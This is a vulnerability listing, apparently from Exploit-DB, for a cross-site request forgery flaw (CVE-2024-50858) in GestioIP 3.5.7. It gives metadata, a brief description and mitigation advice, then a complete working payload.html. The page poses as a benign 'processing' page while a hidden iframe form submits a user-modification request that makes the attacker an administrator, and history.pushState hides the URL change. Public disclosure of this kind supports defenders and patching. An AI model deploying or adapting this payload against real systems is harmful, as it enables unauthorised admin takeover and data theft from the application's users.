GestioIP 3.5.7 - CSRF Vulnerability

vendor:

GestioIP

by:

m4xth0r (Maximiliano Belino)

6.1

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: GestioIP

Affected Version From: 3.5

Affected Version To: 3.5.2007

Patch Exists: NO

Related CWE: CVE-2024-50858

CPE: a:gestioip:gestioip:3.5.7

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2025

GestioIP 3.5.7 – CSRF Vulnerability

GestioIP v3.5.7 is vulnerable to CSRF attacks due to multiple endpoints. An attacker can trick an authenticated admin to visit a malicious URL, leading to unauthorized actions such as data modification, deletion, or exfiltration.

Mitigation:

To mitigate this vulnerability, administrators should implement anti-CSRF tokens, validate and sanitize user input, and avoid executing actions based solely on GET requests.

Source

Exploit-DB raw data:

# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858

### Description

The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.

### Prerequisites

The option "Manage - Manage GestioIP - User Management" must be enabled previously.


### Usage

To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.


### File: payload.html
#### example: editing user named 'maxi'


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to our site</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin-top: 50px;
}
iframe {
display: none;
}
</style>
</head>
<body>
<div class="container">
<h1>Thank you for visiting our site!</h1>
<p>We are processing your request, please wait a moment...</p>
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
</div>
<!-- hidden iframe -->

<iframe name="hiddenFrame"></iframe>

<!-- The form that makes the POST to GestioIP Server -->
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
<input type="hidden" name="name" value="maxi">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="email" value="maxi@test.com">
<input type="hidden" name="phone" value="123">
<input type="hidden" name="comment" value="">
<input type="hidden" name="client_id" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="B2" value="">
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>